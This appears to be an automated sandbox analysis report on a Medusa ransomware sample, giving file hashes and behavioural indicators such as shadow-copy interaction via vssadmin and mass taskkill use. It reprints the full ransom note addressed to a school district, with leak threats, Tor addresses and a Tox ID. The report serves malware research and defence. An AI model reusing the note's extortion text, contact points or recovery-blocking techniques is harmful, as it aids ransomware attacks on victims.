131e8818ae951f6ddb346c59f06ed0573b74861964e071bbfd370b876097f5db

Analysis

max time kernel
223s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28/03/2024, 11:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
Size

623KB
MD5

04581fa15276f0d55108ed58dceac710
SHA1

8b185c6b6f2cac6325f219612bddb7b0011caab4
SHA256

3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6
SHA512

cbdcb5c3b31fdfa6d1add481d4e89e1fb1a81511048158c57dfc6bc9c646b67f971e202293071653f1deda21e721e5f764fdceab49e2da0a7d87dbb96d435f85
SSDEEP

12288:a4GosyZUdGOV5Q0IHj5Mhh3Pr6XAAEjIBBTJIskD5LfWqnC1LEc6AZuA+Lk8YDi9:asu+3pO3peVfmuQtTxKFyqolZO7RP1E1

Score

10^/10

ransomware spyware stealer

Malware Config

Extracted

Path

F:\!!!READ_ME_MEDUSA!!!.txt

Ransom Note

$$\ $$\ $$$$$$$$\ $$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$\ $$$ |$$ _____|$$ __$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$$$\ $$$$ |$$ | $$ | $$ |$$ | $$ |$$ / \__|$$ / $$ | $$\$$\$$ $$ |$$$$$\ $$ | $$ |$$ | $$ |\$$$$$$\ $$$$$$$$ | $$ \$$$ $$ |$$ __| $$ | $$ |$$ | $$ | \____$$\ $$ __$$ | $$ |\$ /$$ |$$ | $$ | $$ |$$ | $$ |$$\ $$ |$$ | $$ | $$ | \_/ $$ |$$$$$$$$\ $$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | \__| \__|\________|\_______/ \______/ \______/ \__| \__| -----------------------------[ Hello, Glendale Unified School District !!! ]-------------------------- Sorry to interrupt your busy business. WHAT HAPPEND? ------------------------------------------------------------ 1. We have PENETRATE your network and COPIED data. * We have penetrated your entire network for several months and researched all about your data. * And finally, we have copied all of your confidential data and uploaded to several private & cloud storages. 2. We have ENCRYPTED your files. We mainly focus on data exfiltration but we also encrypt some of your files too. While you are reading this message, it means your files and data has been ENCRYPTED by world's strongest ransomware. Your files have encrypted with new military-grade encryption algorithm and you can not decrypt your files. But don't worry, we can decrypt your files. There is only one possible way to get back your computers and servers, keep your privacy safe - CONTACT us via LIVE CHAT and pay for the special MEDUSA DECRYPTOR and DECRYPTION KEYs. This MEDUSA DECRYPTOR will restore your entire network within less than 1 business day. WHAT GUARANTEES? --------------------------------------------------------------- We can post all of your sensitive data to the public and send emails to your customers. We have professional OSINTs and media team for leak data to telegram, facebook, twitter channels and top news websites. You can easily search about us. https://www.the74million.org/article/from-campus-rape-cases-to-child-abuse-reports-worst-case-data-breach-rocks-mn-schools/ You can suffer significant problems due disastrous consequences, leading to loss of valuable intellectual property and other sensitive information, costly incident response efforts, information misuse/abuse, loss of customer trust, brand and reputational damage, legal and regulatory issues. After paying for the data breach and decryption, we guarantee that your data will never be leaked and this is also for our reputation. YOU should be AWARE! --------------------------------------------------------------- We will speak only with an authorized person. It can be the CEO, top management, etc. In case you ar not such a person - DON'T CONTACT US! Your decisions and action can result in serious harm to your company! Inform your supervisors and stay calm! If you do not contact us within 3 days, We will start publish your case to our official blog and everybody will start notice your incident! --------------------[ Official blog tor address ]-------------------- Using TOR Browser(https://www.torproject.org/download/): http://medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd.onion/ CONTACT US! ----------------------[ Your company live chat address ]--------------------------- Using TOR Browser(https://www.torproject.org/download/): http://medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion/291b071d62bd319d16df0b898c6cbf90 Or Use Tox Chat Program(https://utox.org/uTox_win64.exe) Add user with our tox ID : 4AE245548F2A225882951FB14E9BF87EE01A0C10AE159B99D1EA62620D91A372205227254A9F Our support email: ( [email protected] ) Company identification hash: 6c93c3147f9d47e4e2292869cd2e17a492ade325b8de488a8fd904d426fa5578

Emails

[email protected]

URLs

https://www.the74million.org/article/from-campus-rape-cases-to-child-abuse-reports-worst-case-data-breach-rocks-mn-schools/

http://medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd.onion/

http://medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion/291b071d62bd319d16df0b898c6cbf90

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (8626) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 49 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YN77APNK\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AV1TQQJE\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CS2CK2LE\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2461186416-2307104501-1787948496-1000\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2461186416-2307104501-1787948496-1000\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\6XKWH8B4\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Bogota	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\OPHPROXY.DLL	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\es-ES\js\timeZones.js	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files\Microsoft Games\Purble Place\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\de-DE\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Status Report.fdt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\PST8	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECRECL.ICO	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\pt-PT.pak	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Berlin	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGAD.XML	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsDoNotTrust.html	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files (x86)\Google\Update\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\js\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WPFT632.CNV	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21326_.GIF	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\HEADER.GIF	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_on.gif	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Mozilla Firefox\omni.ja	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_dot.png	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\gadget.xml	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\!!!READ_ME_MEDUSA!!!.txt	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14754_.GIF	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MAIN.XML	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPrintTemplate.html	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar	3581f1c9ee74f83d3d476aa5a947a040d9f2613a836232180c195f678b64dee6.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4912	1916	WerFault.exe	27

Interacts with shadow copies 2 TTPs 6 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4712	vssadmin.exe
4796	vssadmin.exe
4840	vssadmin.exe
4880	vssadmin.exe
4924	vssadmin.exe
4964	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

pid	Process
4028	taskkill.exe
4632	taskkill.exe
3592	taskkill.exe
3760	taskkill.exe
3804	taskkill.exe
4000	taskkill.exe
3860	taskkill.exe
3296	taskkill.exe
3848	taskkill.exe
3692	taskkill.exe
4184	taskkill.exe
4672	taskkill.exe
3840	taskkill.exe
3236	taskkill.exe
4264	taskkill.exe
4304	taskkill.exe
4508	taskkill.exe
3764	taskkill.exe
3364	taskkill.exe
3112	taskkill.exe
3452	taskkill.exe
3948	taskkill.exe
3576	taskkill.exe
3308	taskkill.exe
4428	taskkill.exe
3352	taskkill.exe
3320	taskkill.exe
3732	taskkill.exe
4548	taskkill.exe
4588	taskkill.exe
4388	taskkill.exe
4468	taskkill.exe
4064	taskkill.exe
3916	taskkill.exe
3664	taskkill.exe
3836	taskkill.exe
3208	taskkill.exe
4224	taskkill.exe
4344	taskkill.exe
4044	taskkill.exe
3784	taskkill.exe
4092	taskkill.exe
4104	taskkill.exe
4144	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
108	PING.EXE

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	3352	taskkill.exe
Token: SeDebugPrivilege	3592	taskkill.exe
Token: SeDebugPrivilege	3760	taskkill.exe
Token: SeDebugPrivilege	3804	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	4064	taskkill.exe
Token: SeDebugPrivilege	3296	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	4000	taskkill.exe
Token: SeDebugPrivilege	3320	taskkill.exe
Token: SeDebugPrivilege	3664	taskkill.exe
Token: SeDebugPrivilege	3732	taskkill.exe
Token: SeDebugPrivilege	4044	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	3784	taskkill.exe
Token: SeDebugPrivilege	4092	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	4028	taskkill.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	3836	taskkill.exe
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeDebugPrivilege	3692	taskkill.exe
Token: SeDebugPrivilege	3840	taskkill.exe
Token: SeDebugPrivilege	3236	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	3208	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	4144	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	4224	taskkill.exe
Token: SeDebugPrivilege	4264	taskkill.exe
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeDebugPrivilege	4344	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	4428	taskkill.exe
Token: SeDebugPrivilege	4468	taskkill.exe
Token: SeDebugPrivilege	4508	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	4672	taskkill.exe
Token: SeBackupPrivilege	4748	vssvc.exe
